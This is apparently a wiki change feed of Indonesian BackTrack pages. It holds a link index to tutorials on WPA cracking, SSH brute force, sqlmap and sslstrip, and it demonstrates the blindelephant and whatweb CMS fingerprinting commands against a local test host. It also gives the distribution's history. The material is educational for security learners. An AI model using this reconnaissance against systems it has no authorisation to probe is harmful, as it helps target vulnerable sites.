==Instalasi==&lt;br /&gt;
* [[Backtrack: Daftar Repository]]&lt;br /&gt;
* [[Backtrack: Membuat Repository Backtrack menggunakan debmirror]]&lt;br /&gt;
* [[Backtrack: Membuat Repository Backtrack menggunakan wget]] - lebih mudah&lt;br /&gt;
* [[Backtrack: Install di Harddisk]]&lt;br /&gt;
* [[Backtrack: Instalsi LiveUSB]]&lt;br /&gt;
* http://www.zimbio.com/Ubuntu+Linux/articles/e1_qHsbCMfz/Install+Backtrack+Applications+Ubuntu&lt;br /&gt;
* [[Backtrack: Install Aplikasi Backtrack di Ubuntu]]&lt;br /&gt;
&lt;br /&gt;
===Ubuntu Pentest Edition===&lt;br /&gt;
&lt;br /&gt;
* http://www.ubuntugeek.com/ubuntu-pentest-edition-for-penetration-testing.html&lt;br /&gt;
* http://www.netinfinity.org/tools/&lt;br /&gt;
* http://www.netinfinity.org/download/&lt;br /&gt;
&lt;br /&gt;
==Konfigurasi Backtrack==&lt;br /&gt;
* [[Backtrack: Mengaktifkan Interface]]&lt;br /&gt;
* [[Backtrack: Mengkonfigurasi IP address]]&lt;br /&gt;
* [[Backtrack: Menyambungkan ke Wireless HotSpot]]&lt;br /&gt;
* [[Backtrack:_Upgrade_Ke_Versi_Terbaru]]&lt;br /&gt;
* http://indobacktrack.or.id/2009/05/backtrack-4-tanpa-lilo&lt;br /&gt;
* http://indobacktrack.or.id/2009/04/konfiguras-ip-di-backtrack-3/&lt;br /&gt;
* http://www.backtrack-linux.org/tutorials/customize-backtrack/&lt;br /&gt;
* http://www.offensive-security.com/backtrack/customising-backtrack-live-cd-the-easy-way/&lt;br /&gt;
* [[Backtrack: Menyambungkan modem ZTE AC2726i]]&lt;br /&gt;
* [[dnsset]] Konfigurasi [[DNS]] Otomatis&lt;br /&gt;
&lt;br /&gt;
==Enumeration==&lt;br /&gt;
* [[Cari Subdomain Dengan dnsmap]]&lt;br /&gt;
* [[Backtrack: DMitry]] Deepmagic Information Gathering Tool&lt;br /&gt;
* [[CMS Identification Menggunakan whatweb]]&lt;br /&gt;
* [[CMS Identification Menggunakan blindelephant]]&lt;br /&gt;
&lt;br /&gt;
==Wireless Hacking==&lt;br /&gt;
* [[Wireless Hacking]]&lt;br /&gt;
* [[Kismet | Backtrack: Kismet Scanning Frekuensi]]&lt;br /&gt;
* [[Backtrack: Tutorial cracking WPA PSK]]&lt;br /&gt;
* http://indobacktrack.or.id/2009/06/hacking-wifi-di-backtrack-3/&lt;br /&gt;
* http://indobacktrack.or.id/2009/09/cracking-wpawpa2-psk-gpu-dengan-pyrit-pre-build-packages-bawaan-backtrack/&lt;br /&gt;
* http://code.google.com/p/pyrit/&lt;br /&gt;
* [[Tutorial agak lengkap tentang Wireless Hacking WEP dan WPA]]&lt;br /&gt;
&lt;br /&gt;
==Hacking==&lt;br /&gt;
* [[Instalasi Web Scarab Vulnerabilities Scanner]]&lt;br /&gt;
* http://indobacktrack.or.id/2010/05/instalasi-web-scarab-vulnerabilities-scanner/&lt;br /&gt;
* [[Backtrack: Cracking Password Windows]]&lt;br /&gt;
* [[Backtrack: sslstrip - hacking https]]&lt;br /&gt;
* http://sectools.org/web-scanners.html&lt;br /&gt;
* [[Backtrack: Kumpulan Wordlist]]&lt;br /&gt;
* [[Backtrack: Menjebol SSH secara BruteForce]]&lt;br /&gt;
* [[Backtrack: sqlmap untuk menjebol dynamic web]]&lt;br /&gt;
* [[Backtrack: mysqlaudit untuk audit MySQL]]&lt;br /&gt;
* [[nmap: scanning sebuah mesin]]&lt;br /&gt;
* http://ezine.echo.or.id/ezine8/ez-r08-zylon-johntheripper.txt&lt;br /&gt;
* [[Melihat struktur folder web server]]&lt;br /&gt;
* [[OS Fingerprinting Menggunakan zenmap]]&lt;br /&gt;
&lt;br /&gt;
===Hacking Video===&lt;br /&gt;
&lt;br /&gt;
* http://www.fileserve.com/file/bA44ghM&lt;br /&gt;
* http://www.fileserve.com/file/KEwD6ub&lt;br /&gt;
* http://www.fileserve.com/file/xYPWeWY&lt;br /&gt;
* http://www.fileserve.com/file/7PbFvWj&lt;br /&gt;
* http://www.fileserve.com/file/MWBMqeU&lt;br /&gt;
* http://www.fileserve.com/file/VDPfSER&lt;br /&gt;
* http://www.fileserve.com/file/gGxPUWH&lt;br /&gt;
* http://www.fileserve.com/file/kdKmTfx&lt;br /&gt;
&lt;br /&gt;
==Referensi==&lt;br /&gt;
&lt;br /&gt;
* http://id-backtrack.com&lt;br /&gt;
* http://indobacktrack.or.id/&lt;br /&gt;
* http://www.backtrack-linux.org&lt;br /&gt;
* http://www.backtrack-linux.org/downloads/&lt;br /&gt;
* http://www.backtrack-linux.org/tutorials/backtrack-forensics/&lt;br /&gt;
* http://www.backtrack-linux.org/bt/wireless-drivers/&lt;br /&gt;
* http://www.offensive-security.com/backtrack/penetration-testing-information-security-distribution/&lt;br /&gt;
* http://www.ilmuhacking.com/&lt;br /&gt;
&lt;br /&gt;
==Pranala Menarik==&lt;br /&gt;
&lt;br /&gt;
* [[Backtrack]]&lt;br /&gt;
* [[GnackTrack]]&lt;br /&gt;
* [[Ubuntu Pentest Edition]]&lt;br /&gt;
* [[Samurai Pentest]]&lt;br /&gt;
* [[Beberapa Tip Hacking]]&lt;br /&gt;
* [[Wireless Hacking]]&lt;br /&gt;
* [[Keamanan Jaringan]]&lt;br /&gt;
&lt;br /&gt;
[[Category: hacking]]&lt;/div&gt;</summary>
		<author><name>Adinugroho</name></author>
	</entry>
	<entry>
		<id>https://lms.onnocenter.or.id/wiki/index.php?title=CMS_Identification_Menggunakan_blindelephant&amp;diff=27259</id>
		<title>CMS Identification Menggunakan blindelephant</title>
		<link rel="alternate" type="text/html" href="https://lms.onnocenter.or.id/wiki/index.php?title=CMS_Identification_Menggunakan_blindelephant&amp;diff=27259"/>
		<updated>2011-07-17T06:49:56Z</updated>

		<summary type="html">&lt;p&gt;Adinugroho: New page: blindelephant adalah aplikasi yang berfungsi untuk mengetahui versi dari sebuah web application. ==Web Application Yang Didukung== Saat ini web application yang didukung adalah: * confluen...&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;blindelephant adalah aplikasi yang berfungsi untuk mengetahui versi dari sebuah web application.&lt;br /&gt;
==Web Application Yang Didukung==&lt;br /&gt;
Saat ini web application yang didukung adalah:&lt;br /&gt;
* confluence with 0 plugins&lt;br /&gt;
* drupal with 16 plugins&lt;br /&gt;
*  - admin_menu&lt;br /&gt;
*  - cck&lt;br /&gt;
*  - date&lt;br /&gt;
*  - filefield&lt;br /&gt;
*  - google_analytics&lt;br /&gt;
*  - imageapi&lt;br /&gt;
*  - imagecache&lt;br /&gt;
*  - imagefield&lt;br /&gt;
*  - imce&lt;br /&gt;
*  - imce_swfupload&lt;br /&gt;
*  - pathauto&lt;br /&gt;
*  - print&lt;br /&gt;
*  - spamicide&lt;br /&gt;
*  - tagadelic&lt;br /&gt;
*  - token&lt;br /&gt;
*  - views&lt;br /&gt;
* joomla with 0 plugins&lt;br /&gt;
* liferay with 0 plugins&lt;br /&gt;
* mediawiki with 0 plugins&lt;br /&gt;
* moodle with 0 plugins&lt;br /&gt;
* movabletype with 0 plugins&lt;br /&gt;
* oscommerce with 0 plugins&lt;br /&gt;
* phpbb with 0 plugins&lt;br /&gt;
* phpmyadmin with 0 plugins&lt;br /&gt;
* phpnuke with 0 plugins&lt;br /&gt;
* spip with 0 plugins&lt;br /&gt;
* tikiwiki with 0 plugins&lt;br /&gt;
* twiki with 0 plugins&lt;br /&gt;
* wordpress with 26 plugins&lt;br /&gt;
*  - add-to-any&lt;br /&gt;
*  - advertising-manager&lt;br /&gt;
*  - akismet&lt;br /&gt;
*  - all-in-one-seo-pack&lt;br /&gt;
*  - buddypress&lt;br /&gt;
*  - contact-form-7&lt;br /&gt;
*  - gd-star-rating&lt;br /&gt;
*  - google-analyticator&lt;br /&gt;
*  - google-sitemap-generator&lt;br /&gt;
*  - newsletter&lt;br /&gt;
*  - nextgen-gallery&lt;br /&gt;
*  - polldaddy&lt;br /&gt;
*  - simple-tags&lt;br /&gt;
*  - smart-youtube&lt;br /&gt;
*  - sociable&lt;br /&gt;
*  - stats&lt;br /&gt;
*  - subscribe2&lt;br /&gt;
*  - tinymce-advanced&lt;br /&gt;
*  - twitter-tools&lt;br /&gt;
*  - wp-e-commerce&lt;br /&gt;
*  - wp-pagenavi&lt;br /&gt;
*  - wp-spamfree&lt;br /&gt;
*  - wp-super-cache&lt;br /&gt;
*  - wp-useronline&lt;br /&gt;
*  - wptouch&lt;br /&gt;
*  - yet-another-related-posts-plugin&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Cara Penggunaan==&lt;br /&gt;
 python BlindElephant.py http://bt.foo.org/books wordpress&lt;br /&gt;
 Loaded /pentest/web/blindelephant/src/blindelephant/dbs/wordpress.pkl with 213 versions, 5214 differentiating paths, and 300 version groups.&lt;br /&gt;
 Starting BlindElephant fingerprint for version of wordpress at http://bt.foo.org/books &lt;br /&gt;
 &lt;br /&gt;
 Hit http://bt.foo.org/books/readme.html&lt;br /&gt;
 File produced no match. Error: Retrieved file doesn&#039;t match known fingerprint. 11fda7bdaec3851353224a08826e46f2 &lt;br /&gt;
 &lt;br /&gt;
 Hit http://bt.foo.org/books/wp-includes/js/tinymce/tiny_mce.js&lt;br /&gt;
 File produced no match. Error: Retrieved file doesn&#039;t match known fingerprint. 9f861e2b752c1a4d5fc691f3e3195b0a &lt;br /&gt;
 &lt;br /&gt;
 Hit http://bt.foo.org/books/wp-includes/js/autosave.js&lt;br /&gt;
 Possible versions based on result: 3.1-beta1, 3.1-beta1-IIS, 3.1-beta2, 3.1-beta2-IIS, 3.1-RC1, 3.1-RC2, 3.1-RC2-IIS&lt;br /&gt;
 &lt;br /&gt;
 Hit http://bt.foo.org/books/wp-includes/js/tinymce/themes/advanced/about.htm&lt;br /&gt;
 Possible versions based on result: 3.1-beta1, 3.1-beta1-IIS, 3.1-beta2, 3.1-beta2-IIS, 3.1-RC1, 3.1-RC2, 3.1-RC2-IIS&lt;br /&gt;
 &lt;br /&gt;
 Hit http://bt.foo.org/books/wp-includes/js/tinymce/themes/advanced/source_editor.htm&lt;br /&gt;
 Possible versions based on result: 3.1-beta1, 3.1-beta1-IIS, 3.1-beta2, 3.1-beta2-IIS, 3.1-RC1, 3.1-RC2, 3.1-RC2-IIS&lt;br /&gt;
 &lt;br /&gt;
 Hit http://bt.foo.org/books/wp-includes/js/tinymce/themes/advanced/link.htm&lt;br /&gt;
 Possible versions based on result: 3.1-beta1, 3.1-beta1-IIS, 3.1-beta2, 3.1-beta2-IIS, 3.1-RC1, 3.1-RC2, 3.1-RC2-IIS&lt;br /&gt;
 &lt;br /&gt;
 Hit http://bt.foo.org/books/wp-includes/js/tinymce/plugins/inlinepopups/editor_plugin.js&lt;br /&gt;
 Possible versions based on result: 3.1-beta1, 3.1-beta1-IIS, 3.1-beta2, 3.1-beta2-IIS, 3.1-RC1, 3.1-RC2, 3.1-RC2-IIS&lt;br /&gt;
 &lt;br /&gt;
 Hit http://bt.foo.org/books/wp-includes/js/swfupload/handlers.js&lt;br /&gt;
 File produced no match. Error: Retrieved file doesn&#039;t match known fingerprint. 447a01d08e7047781453c9b37d1af384 &lt;br /&gt;
 &lt;br /&gt;
 Hit http://bt.foo.org/books/wp-includes/js/tinymce/themes/advanced/image.htm&lt;br /&gt;
 Possible versions based on result: 3.1-beta1, 3.1-beta1-IIS, 3.1-beta2, 3.1-beta2-IIS, 3.1-RC1, 3.1-RC2, 3.1-RC2-IIS&lt;br /&gt;
 &lt;br /&gt;
 Hit http://bt.foo.org/books/wp-includes/js/tinymce/themes/advanced/color_picker.htm&lt;br /&gt;
 Possible versions based on result: 3.1-beta1, 3.1-beta1-IIS, 3.1-beta2, 3.1-beta2-IIS, 3.1-RC1, 3.1-RC2, 3.1-RC2-IIS&lt;br /&gt;
 &lt;br /&gt;
 Hit http://bt.foo.org/books/wp-includes/js/tinymce/themes/advanced/anchor.htm&lt;br /&gt;
 Possible versions based on result: 3.1-beta1, 3.1-beta1-IIS, 3.1-beta2, 3.1-beta2-IIS, 3.1-RC1, 3.1-RC2, 3.1-RC2-IIS&lt;br /&gt;
 &lt;br /&gt;
 Hit http://bt.foo.org/books/wp-includes/js/tinymce/themes/advanced/charmap.htm&lt;br /&gt;
 Possible versions based on result: 3.1-beta1, 3.1-beta1-IIS, 3.1-beta2, 3.1-beta2-IIS, 3.1-RC1, 3.1-RC2, 3.1-RC2-IIS&lt;br /&gt;
 &lt;br /&gt;
 Hit http://bt.foo.org/books/wp-content/plugins/akismet/readme.txt&lt;br /&gt;
 File produced no match. Error: Retrieved file doesn&#039;t match known fingerprint. 397219dc64f0489ed3e3e9e597ad2db8 &lt;br /&gt;
 &lt;br /&gt;
 Hit http://bt.foo.org/books/wp-includes/js/tinymce/themes/advanced/editor_template.js&lt;br /&gt;
 Possible versions based on result: 3.1-beta1, 3.1-beta1-IIS, 3.1-beta2, 3.1-beta2-IIS, 3.1-RC1, 3.1-RC2, 3.1-RC2-IIS&lt;br /&gt;
 &lt;br /&gt;
 Hit http://bt.foo.org/books/wp-includes/js/tinymce/plugins/wordpress/editor_plugin.js&lt;br /&gt;
 Possible versions based on result: 3.1-beta1, 3.1-beta1-IIS, 3.1-beta2, 3.1-beta2-IIS, 3.1-RC1, 3.1-RC2, 3.1-RC2-IIS&lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
 Fingerprinting resulted in:&lt;br /&gt;
 3.1-beta1&lt;br /&gt;
 3.1-beta1-IIS&lt;br /&gt;
 3.1-beta2&lt;br /&gt;
 3.1-beta2-IIS&lt;br /&gt;
 3.1-RC1&lt;br /&gt;
 3.1-RC2&lt;br /&gt;
 3.1-RC2-IIS&lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
 Best Guess: 3.1-RC2-IIS&lt;br /&gt;
 &lt;br /&gt;
==Pranala Menarik==&lt;br /&gt;
* [[Backtrack]]&lt;br /&gt;
[[Category:Backtrack]][[Category:CMS Identification]]&lt;/div&gt;</summary>
		<author><name>Adinugroho</name></author>
	</entry>
	<entry>
		<id>https://lms.onnocenter.or.id/wiki/index.php?title=File:Whatweb.png&amp;diff=27258</id>
		<title>File:Whatweb.png</title>
		<link rel="alternate" type="text/html" href="https://lms.onnocenter.or.id/wiki/index.php?title=File:Whatweb.png&amp;diff=27258"/>
		<updated>2011-07-17T06:48:23Z</updated>

		<summary type="html">&lt;p&gt;Adinugroho: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;/div&gt;</summary>
		<author><name>Adinugroho</name></author>
	</entry>
	<entry>
		<id>https://lms.onnocenter.or.id/wiki/index.php?title=CMS_Identification_Menggunakan_whatweb&amp;diff=27257</id>
		<title>CMS Identification Menggunakan whatweb</title>
		<link rel="alternate" type="text/html" href="https://lms.onnocenter.or.id/wiki/index.php?title=CMS_Identification_Menggunakan_whatweb&amp;diff=27257"/>
		<updated>2011-07-17T06:47:57Z</updated>

		<summary type="html">&lt;p&gt;Adinugroho: /* Penggunaan whatweb untuk Identifikasi CMS */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&#039;&#039;&#039;whatweb&#039;&#039;&#039; adalah aplikasi yang berguna untuk identifikasi sebuah website. Tidak hanya memunculkan CMS apa yang digunakan, whatweb juga mengidentifikasi web server dan OS server yang digunakan serta memunculkan alamat email yang tertera di website. &lt;br /&gt;
==Penggunaan whatweb untuk Identifikasi CMS==&lt;br /&gt;
Penggunaan whatweb secara standar.&lt;br /&gt;
&lt;br /&gt;
[[Image:Whatweb.png]]&lt;br /&gt;
&lt;br /&gt;
 root@batik:/pentest/enumeration/web/whatweb# ruby1.8 whatweb http://bt.foo.org/books&lt;br /&gt;
 Could not load SystemTimer &amp;gt;= v1.2.0. Falling back to timeout.rb. SystemTimer is STRONGLY recommended for timeouts in Ruby 1.8.7. See http://ph7spot.com/blog/system-timer-1-2-release for details.&lt;br /&gt;
 http://bt.foo.org/books [301] HTTPServer[Ubuntu Linux][Apache/2.2.14 (Ubuntu)], RedirectLocation[http://bt.foo.org/books/], Apache[2.2.14], IP[127.0.1.1], Title[301 Moved Permanently], Country[RESERVED][ZZ]&lt;br /&gt;
 http://bt.foo.org/books/ [200] WordPress[3.1.4], MetaGenerator[WordPress 3.1.4], HTTPServer[Ubuntu Linux][Apache/2.2.14 (Ubuntu)], x-pingback[,http://batik/books/xmlrpc.php], UncommonHeaders[x-pingback], Apache[2.2.14], IP[127.0.1.1], PHP[5.3.2-1ubuntu4.9], X-Powered-By[PHP/5.3.2-1ubuntu4.9], Title[ root], Email[pagvac@gnucitizen.org,thomas@habets.pp.se,vh@thc.org], Country[RESERVED][ZZ]&lt;br /&gt;
&lt;br /&gt;
Penggunaan whatweb dengan option -v (verbose) akan memberikan hasil secara detail.&lt;br /&gt;
 root@batik:/pentest/enumeration/web/whatweb# ruby1.8 whatweb -v http://bt.foo.org/books&lt;br /&gt;
 Could not load SystemTimer &amp;gt;= v1.2.0. Falling back to timeout.rb. SystemTimer is STRONGLY recommended for timeouts in Ruby 1.8.7. See http://ph7spot.com/blog/system-timer-1-2-release for details.&lt;br /&gt;
 bt.foo.org/books [301]&lt;br /&gt;
 http://bt.foo.org/books [301] HTTPServer[Ubuntu Linux][Apache/2.2.14 (Ubuntu)], RedirectLocation[http://bt.foo.org/books/], Apache[2.2.14], IP[127.0.1.1], Title[301 Moved Permanently], Country[RESERVED][ZZ]&lt;br /&gt;
 URL    : http://bt.foo.org/books&lt;br /&gt;
 Status : 301&lt;br /&gt;
    Apache ---------------------------------------------------------------------&lt;br /&gt;
 	Description: The Apache HTTP Server Project is an effort to develop and &lt;br /&gt;
 	             maintain an open-source HTTP server for modern operating &lt;br /&gt;
 	             systems including UNIX and Windows NT. The goal of this &lt;br /&gt;
 	             project is to provide a secure, efficient and extensible &lt;br /&gt;
 	             server that provides HTTP services in sync with the current &lt;br /&gt;
 	             HTTP standards. - homepage: http://httpd.apache.org/ &lt;br /&gt;
 	Version    : 2.2.14&lt;br /&gt;
 &lt;br /&gt;
    Country --------------------------------------------------------------------&lt;br /&gt;
 	Description: GeoIP IP2Country lookup. To refresh DB, replace &lt;br /&gt;
 	             IpToCountry.csv and remove country-ips.dat. GeoIP database &lt;br /&gt;
 	             from http://software77.net/geo-ip/. Local IPv4 addresses &lt;br /&gt;
 	             are represented as ZZ according to an ISO convention. &lt;br /&gt;
 	             Lookup code developed by Matthias Wachter for rubyquiz.com &lt;br /&gt;
 	             and used with permission. &lt;br /&gt;
 	Module     : ZZ&lt;br /&gt;
 	String     : RESERVED&lt;br /&gt;
 &lt;br /&gt;
    HTTPServer -----------------------------------------------------------------&lt;br /&gt;
 	Description: HTTP server header string &lt;br /&gt;
 	Os         : Ubuntu Linux&lt;br /&gt;
 	String     : Apache/2.2.14 (Ubuntu) (from server string)&lt;br /&gt;
 &lt;br /&gt;
    IP -------------------------------------------------------------------------&lt;br /&gt;
 	Description: IP address of the target, if available. &lt;br /&gt;
 	String     : 127.0.1.1&lt;br /&gt;
 &lt;br /&gt;
    RedirectLocation -----------------------------------------------------------&lt;br /&gt;
 	Description: HTTP Server string location. used with http-status 301 and &lt;br /&gt;
 	             302 &lt;br /&gt;
 	String     : http://bt.foo.org/books/ (from location)&lt;br /&gt;
 &lt;br /&gt;
    Title ----------------------------------------------------------------------&lt;br /&gt;
 	Description: The HTML page title &lt;br /&gt;
 	String     : 301 Moved Permanently (from page title)&lt;br /&gt;
 &lt;br /&gt;
 bt.foo.org/books/ [200]&lt;br /&gt;
 http://bt.foo.org/books/ [200] WordPress[3.1.4], MetaGenerator[WordPress 3.1.4], HTTPServer[Ubuntu Linux][Apache/2.2.14 (Ubuntu)], x-pingback[,http://batik/books/xmlrpc.php], UncommonHeaders[x-pingback], Apache[2.2.14], IP[127.0.1.1], PHP[5.3.2-1ubuntu4.9], X-Powered-By[PHP/5.3.2-1ubuntu4.9], Title[ root], Email[pagvac@gnucitizen.org,thomas@habets.pp.se,vh@thc.org], Country[RESERVED][ZZ]&lt;br /&gt;
 URL    : http://bt.foo.org/books/&lt;br /&gt;
 Status : 200&lt;br /&gt;
    Apache ---------------------------------------------------------------------&lt;br /&gt;
 	Description: The Apache HTTP Server Project is an effort to develop and &lt;br /&gt;
 	             maintain an open-source HTTP server for modern operating &lt;br /&gt;
 	             systems including UNIX and Windows NT. The goal of this &lt;br /&gt;
 	             project is to provide a secure, efficient and extensible &lt;br /&gt;
 	             server that provides HTTP services in sync with the current &lt;br /&gt;
 	             HTTP standards. - homepage: http://httpd.apache.org/ &lt;br /&gt;
 	Version    : 2.2.14&lt;br /&gt;
 &lt;br /&gt;
    Country --------------------------------------------------------------------&lt;br /&gt;
 	Description: GeoIP IP2Country lookup. To refresh DB, replace &lt;br /&gt;
 	             IpToCountry.csv and remove country-ips.dat. GeoIP database &lt;br /&gt;
 	             from http://software77.net/geo-ip/. Local IPv4 addresses &lt;br /&gt;
 	             are represented as ZZ according to an ISO convention. &lt;br /&gt;
 	             Lookup code developed by Matthias Wachter for rubyquiz.com &lt;br /&gt;
 	             and used with permission. &lt;br /&gt;
 	Module     : ZZ&lt;br /&gt;
 	String     : RESERVED&lt;br /&gt;
 &lt;br /&gt;
    Email ----------------------------------------------------------------------&lt;br /&gt;
 	Description: Extract email addresses. Find valid email address and &lt;br /&gt;
 	             syntactically invalid email addresses from mailto: link &lt;br /&gt;
 	             tags. We match syntactically invalid links containing &lt;br /&gt;
 	             mailto: to catch anti-spam email addresses, eg. bob at &lt;br /&gt;
 	             gmail.com. This uses the simplified email regular &lt;br /&gt;
 	             expression from &lt;br /&gt;
 	             http://www.regular-expressions.info/email.html for valid &lt;br /&gt;
 	             email add &lt;br /&gt;
 	String     : pagvac@gnucitizen.org,thomas@habets.pp.se,vh@thc.org&lt;br /&gt;
 &lt;br /&gt;
    HTTPServer -----------------------------------------------------------------&lt;br /&gt;
 	Description: HTTP server header string &lt;br /&gt;
 	Os         : Ubuntu Linux&lt;br /&gt;
 	String     : Apache/2.2.14 (Ubuntu) (from server string)&lt;br /&gt;
 &lt;br /&gt;
    IP -------------------------------------------------------------------------&lt;br /&gt;
 	Description: IP address of the target, if available. &lt;br /&gt;
 	String     : 127.0.1.1&lt;br /&gt;
 &lt;br /&gt;
    MetaGenerator --------------------------------------------------------------&lt;br /&gt;
 	Description: This plugin identifies meta generator tags and extracts its &lt;br /&gt;
 	             value. &lt;br /&gt;
 	String     : WordPress 3.1.4&lt;br /&gt;
 &lt;br /&gt;
    PHP ------------------------------------------------------------------------&lt;br /&gt;
 	Description: PHP is a widely-used general-purpose scripting language &lt;br /&gt;
 	             that is especially suited for Web development and can be &lt;br /&gt;
 	             embedded into HTML. - homepage: http://www.php.net/ &lt;br /&gt;
 	Version    : 5.3.2-1ubuntu4.9&lt;br /&gt;
 &lt;br /&gt;
    Title ----------------------------------------------------------------------&lt;br /&gt;
 	Description: The HTML page title &lt;br /&gt;
 	String     :  root (from page title)&lt;br /&gt;
 &lt;br /&gt;
    UncommonHeaders ------------------------------------------------------------&lt;br /&gt;
 	Description: Uncommon HTTP server headers. The blacklist includes all &lt;br /&gt;
 	             the standard headers and many non standard but common ones. &lt;br /&gt;
 	             Interesting but fairly common headers should have their own &lt;br /&gt;
 	             plugins, eg. x-powered-by, server and x-aspnet-version. &lt;br /&gt;
 	             Info about headers can be found at www.http-stats.com &lt;br /&gt;
 	String     : x-pingback (from headers)&lt;br /&gt;
 &lt;br /&gt;
    WordPress ------------------------------------------------------------------&lt;br /&gt;
 	Description: WordPress is an opensource blogging system commonly used as &lt;br /&gt;
 	             a CMS. Homepage: http://www.wordpress.org/ &lt;br /&gt;
 	Version    : 3.1.4&lt;br /&gt;
 &lt;br /&gt;
    X-Powered-By ---------------------------------------------------------------&lt;br /&gt;
 	Description: X-Powered-By HTTP header &lt;br /&gt;
 	String     : PHP/5.3.2-1ubuntu4.9 (from x-powered-by string)&lt;br /&gt;
 &lt;br /&gt;
    x-pingback -----------------------------------------------------------------&lt;br /&gt;
 	Description: A pingback is one of three types of linkbacks, methods for &lt;br /&gt;
 	             Web authors to request notification when somebody links to &lt;br /&gt;
 	             one of their documents. This enables authors to keep track &lt;br /&gt;
 	             of who is linking to, or referring to their articles. Some &lt;br /&gt;
 	             weblog software, such as Movable Type, Serendipity, &lt;br /&gt;
 	             WordPress and Telligent Community, support automatic &lt;br /&gt;
 	             pingbacks &lt;br /&gt;
 	String     : ,http://batik/books/xmlrpc.php&lt;br /&gt;
&lt;br /&gt;
==Pranala Menarik==&lt;br /&gt;
* [[Backtrack]]&lt;br /&gt;
&lt;br /&gt;
[[Category:Backtrack]]&lt;br /&gt;
[[Category:CMS Identification]]&lt;/div&gt;</summary>
		<author><name>Adinugroho</name></author>
	</entry>
	<entry>
		<id>https://lms.onnocenter.or.id/wiki/index.php?title=Backtrack&amp;diff=27256</id>
		<title>Backtrack</title>
		<link rel="alternate" type="text/html" href="https://lms.onnocenter.or.id/wiki/index.php?title=Backtrack&amp;diff=27256"/>
		<updated>2011-07-17T06:47:33Z</updated>

		<summary type="html">&lt;p&gt;Adinugroho: /* Enumeration */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Salah satu distro [[linux]] yang awalnya merupakan turunan dari [[slackware]]. Backtrack merupakan merger dari [[whax]] dan [[auditor security collection]]. Sekarang ini [[Backtrack]] berbasis [[Debian]]. Backtrack menjadi tool yang sangat baik bagi mereka yang ingin belajar teknik hacking dan [[keamanan jaringan]]. [[Backtrack]] dapat di ambil secara bebas dari&lt;br /&gt;
&lt;br /&gt;
 &#039;&#039;&#039;http://www.backtrack-linux.org/downloads/&#039;&#039;&#039;&lt;br /&gt;
 http://opensource.telkomspeedy.com/repo/backtrack&lt;br /&gt;
 http://belajar.internetsehat.org/iso/backtrack-5.0&lt;br /&gt;
 http://bebasupload.com/users/yusuf/3261/indobacktrack.or.id BackTrack 5 dr IndoBackTrack&lt;br /&gt;
 http://repo.antihackerlink.or.id/download.php?list.88&lt;br /&gt;
 http://iso.ukdw.ac.id/backtrack5/&lt;br /&gt;
 http://pandawa.ipb.ac.id/iso/backtrack/bt5/ &lt;br /&gt;
&lt;br /&gt;
Backtrack dua dirilis pada tanggal 6 maret 2007 yang memasukkan lebih dari 300 tool security sedangkan versi beta 3 dari backtrack dirilis pada tanggal 14 desember 2007 yang pada rilis ketiga ini lebih difokuskan untuk support [[hardware]]. Sedangkan versi backtrack 3 dirilis pada tanggal 19 juni 2008 pada backtrack versi 3 ini memasukkan [[saint]] dan [[maltego]] sedangkan [[nessus]] tidak dimasukkan serta tetap memakai kernel versi 2.6.21.5. pada BackTrack 4 Final sekarang ini menawarkan [[kernel]] [[linux]] terbaru yaitu kernel 2.6.30.4 .Dilengkapi juga dengan patch untuk wireless driver untuk menanggulangi serangan [[wireless injection]] ([[wireless injection attacks]]) &lt;br /&gt;
&lt;br /&gt;
== Sejarah backtrack ==&lt;br /&gt;
&lt;br /&gt;
Backtrack dibuat oleh Mati Aharoni yang merupakan konsultan security dari Israel dan max mosser jadi merupakan kolaborasi komunitas, backtrack sendiri merupakan merger dari [[whax]] yang mana [[whax]] ini adalah salah satu distro [[linux]] yang digunakan untuk test keamanan yang asal dari [[whax]] sendiri dari [[knoppix]]. Ketika [[knoppix]] mencapi versi 3.0 maka dinamakan dengan [[whax]]. Dengan [[whax]] kita bisa melakukan test securtity dari berbagai jaringan dimana saja .&lt;br /&gt;
&lt;br /&gt;
Max mosser merupakan auditor security collection yang menghususkan dirinya untuk melakukan penetrasi keamanan di [[linux]], gabungan dari auditor dan whax ini sendiri menghasilakan 300 tool yang digunakan untuk testing security jaringan. Auditor security collection juga terdapat pada knoppix.&lt;br /&gt;
&lt;br /&gt;
== Fitur Backtrack ==&lt;br /&gt;
Fitur dari backtrack :&lt;br /&gt;
Diantara beberapa tool yang terdapat dalam backtrack :&lt;br /&gt;
&lt;br /&gt;
• Metasploit integration&lt;br /&gt;
• RFMON wireless drivers&lt;br /&gt;
• [[Kismet]]&lt;br /&gt;
• AutoScan-Network - AutoScan-Network is a network discovering and managing application&lt;br /&gt;
• [[Nmap]]&lt;br /&gt;
• [[Ettercap]]&lt;br /&gt;
• [[Wireshark]] (dulu di kenal sebagai [[Ethereal]])&lt;br /&gt;
&lt;br /&gt;
• Enumeration&lt;br /&gt;
• Exploit Archives&lt;br /&gt;
• [[Scanners]]&lt;br /&gt;
• Password Attacks&lt;br /&gt;
• Fuzzers&lt;br /&gt;
• [[Spoofing]]&lt;br /&gt;
• [[Sniffers]]&lt;br /&gt;
• Tunneling&lt;br /&gt;
• [[Wireless]] Tools&lt;br /&gt;
• [[Bluetooth]]&lt;br /&gt;
• Cisco Tools&lt;br /&gt;
• Database Tools&lt;br /&gt;
• Forensic Tools&lt;br /&gt;
• BackTrack Services&lt;br /&gt;
• Reversing&lt;br /&gt;
• Misc&lt;br /&gt;
&lt;br /&gt;
Tapi disamping tool jaringan backtrack memasukkan [[mozilla]], [[pidgin]], [[k3b]], [[xmms]] dll.&lt;br /&gt;
&lt;br /&gt;
==Rilis Backtrack==&lt;br /&gt;
&lt;br /&gt;
 26-05-2006 rilis backtrack pertama kali yang merupakan versi non beta 1.0&lt;br /&gt;
 13-10-2006 backtrack 2 beta pertama untuk publik di rilis&lt;br /&gt;
 19-11-2006 backtrack 2 beta kedua untuk publik di rilis&lt;br /&gt;
 06-03-2007 backtrack 2 final dirilis&lt;br /&gt;
 17-12-2007 backtrack 3 beta pertama dirilis &lt;br /&gt;
 19-03-2008 backtrack 3 final dirilis&lt;br /&gt;
